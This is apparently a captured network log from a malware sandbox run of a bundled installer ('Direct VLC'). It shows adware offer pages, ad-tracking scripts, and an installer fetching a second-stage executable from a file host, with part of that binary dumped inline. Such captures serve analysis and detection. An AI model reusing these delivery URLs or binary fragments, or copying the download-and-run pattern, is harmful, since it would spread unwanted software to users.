ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:39 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>


GET /js/show_ads.js HTTP/1.1
Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Accept-Ranges: bytes
ETag: W/"10660-1442925030000"
Last-Modified: Tue, 22 Sep 2015 12:30:30 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 02 Oct 2015 13:51:39 GMT
a..............200....ks..........H..w..RdEn.Q..d.......EH$...% ".{w..
.....v...qo....].>.:l.........4.s63?x.>Mx1......4.B.v...........
Y....RH....x.4.!K.T/.,....2.n.....'./f.du."..s.....?..1.'...<J...9.
....gG.. ....X.......)....X..O. .9.".a'.,.g..,..'.<...=.`..M...S..4
.q.G.,...D.|\0>....(....<e_.M<R.......P.l..x..:...l..u..d.1..
.\..................mV . .Q..|...iZ..n.{.P!~.9.........g..52.....9.r.n
D...U.j./g..a.%.........u)..... k...e..e...[E-8t..i...h.O0_<3,-.>
;.i..r...qv..... .n...f"H.G..."6f3.:h.Z.9{...../..x..|..: ..\..}a.....
.200.........I ^..-..u.........T.&.E...jEH...;:....}...(...!.C-e.h....
[email protected]........ lTp....Lh......z.:......}...x.....:......j...}
%.e..h..juy......'o......D..uH...........-.,..v...R.q..1....G...6Xb...
y#...p...[...{[email protected]..~w..:....a&..i...~7....&......G7..$?...8..
P...$ ...!...$.?..d.!h7,"[email protected]~....@.)O.s<...y.W.
N.F....'......._2*Q.IOf....OS.B.!...(.`.-.. .9D..i6KQ....[...U..w..o.&
gt;?.I<...A.po...#...'.$:.."!.u#.c].r..h.fu.-.|.F.6......./.....@.[
..6.p.l(.>..$".y..K.cMb...... ...<.=X..200..B%.#1p`..5dJ0...\...
=.......2...0._D<HP.h.b..!.!.&B.g_$.~]5....J.,.....X&.>."e...F.)
8.7.`.B..H$.{".....ob...{....#...f...c..5.....x.0\...q.U?.."."[..(TF.}
.K...5>Le|.XJ.^.!.u.W.....xY......<Xp......Xf....3...:.g.g7.... 
...w..J...w.d.X.A..3."\......P.C...~%. ..bx....;....c.....x)9.-..s.z..
.[...zx....%....uGb~.3=sx..A.... ..<..Y.....%....g(P..".O.......Z..
.i..z9....j....`{.6..!.H..k..v...%.....|.........M...H...e..[5....
<<< skipped >>>

GET /ads-sync.js?v=1&key=162e6f885a307ca57c54025fd012cc8c&ch=&click=&tz=3&t=1443793909269&flashVer=11.6 r602&scrWidth=1276&scrHeight=846&cIds= HTTP/1.1


Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 293
Date: Fri, 02 Oct 2015 13:51:40 GMT
document.write("<script type=\"text\/javascript\">new Image().sr
c = \"http:\/\/n20adshostnet.com\" \"\/no-im\" \"pressi\" \"on.gif?p=2
32&ch=\" \"&l=UA\" \"&h=d732eeb141f0e071ef59728373a98bb3&t=\" new Date
().getTime() \"&s=ebee196bad2a39aaaedb5f82bf096818&tz=3.0&sh=846&sw=12
76\";<\/script>");.....


GET /no-impression.gif?p=232&ch=&l=UA&h=d732eeb141f0e071ef59728373a98bb3&t=1443793909457&s=ebee196bad2a39aaaedb5f82bf096818&tz=3.0&sh=846&sw=1276 HTTP/1.1


Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: epomUUID=b555a0c0-690c-11e5-aedb-f8bc12538c80; Domain=.n20adshostnet.com; Expires=Thu, 27-Sep-2035 13:51:40 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"49-1424190054000"
Last-Modified: Tue, 17 Feb 2015 16:20:54 GMT
Content-Type: image/gif
Content-Length: 49
Date: Fri, 02 Oct 2015 13:51:40 GMT
GIF89a...................!.......,...........T..;HTTP/1.1 200 OK..Serv
er: Apache-Coyote/1.1..Cache-Control: no-cache..Pragma: no-cache..Expi
res: Thu, 01 Jan 1970 00:00:00 GMT..P3P: CP="CAO PSA OUR"..Set-Cookie:
 epomUUID=b555a0c0-690c-11e5-aedb-f8bc12538c80; Domain=.n20adshostnet.
com; Expires=Thu, 27-Sep-2035 13:51:40 GMT; Path=/..Accept-Ranges: byt
es..ETag: W/"49-1424190054000"..Last-Modified: Tue, 17 Feb 2015 16:20:
54 GMT..Content-Type: image/gif..Content-Length: 49..Date: Fri, 02 Oct
 2015 13:51:40 GMT..GIF89a...................!.......,...........T..;.
.



GET /offers/images/Theme12/topComp.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:30 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bgImg.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:30 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>..HTTP/1.1 404 Not Found..Date: Fri, 02 Oct 2015 13:51:30 GMT..Co
ntent-Type: text/html..Content-Length: 1245..Connection: keep-aliv
<<< skipped >>>


GET /r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=257232512&utmhn=installer.ppdownload.com&utmcs=utf-8&utmsr=1276x846&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Thank you for installing Direct VLC&utmhid=474060882&utmr=-&utmp=/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&utmht=1443793907848&utmac=UA-37348037-1&utmcc=__utma=81742934.1974052579.1443793908.1443793908.1443793908.1;+__utmz=81742934.1443793908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1507817284&utmredir=3&utmu=qhAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1
Accept: */*
Referer: hXXp://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: stats.g.doubleclick.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=10886400
Date: Fri, 02 Oct 2015 13:51:39 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Strict-Transport-Security: max-age=10886400..Date: Fri, 
02 Oct 2015 13:51:39 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 
00:00:00 GMT..Cache-Control: no-cache, no-store, must-revalidate..Last
-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options: nosn
iff..Content-Type: image/gif..Server: Golfe2..Content-Length: 35..GIF8
9a.............,...........D..;..



GET /offers/images/Theme12/topComp.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bgImg.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/button.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>..HTTP/1.1 404 Not Found..Date: Fri, 02 Oct 2015 13:51:26 GMT..Co
ntent-Type: text/html..Content-Length: 1245..Connection: keep-aliv
<<< skipped >>>

GET /offers/ui/css/start/jquery-ui-1.8.19.custom.css HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:29 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>....
<<< skipped >>>


GET /dl/7979023c-f144-46ae-93a8-d9ea51ff17e7 HTTP/1.1
Accept: */*
Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927
User-Agent: Setup Factory 8.0
Host: fra-7m16-stor04.uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Oct 2015 13:51:21 GMT
Content-Type: application/octet-stream
Content-Length: 711325
Last-Modified: Fri, 25 Sep 2015 20:22:19 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="Product29271_Distribution30060_Partner935.exe"
ETag: "5605acfb-ada9d"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......0...............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
..0............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /file/uj6g51wd HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:19 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Set-Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m19-stor01.uploaded.net/dl/eab67468-b301-4ba1-bc6a-21c9013f0cb1
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:19 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Set-Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927; path=/..Expire
s: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, m
ust-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Location:
 hXXp://fra-7m19-stor01.uploaded.net/dl/eab67468-b301-4ba1-bc6a-21c901
3f0cb1..Vary: Accept-Encoding......


GET /file/pnkw58oz HTTP/1.1


Accept: */*
Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927
User-Agent: Setup Factory 8.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:21 GMT
Content-Type: text/html
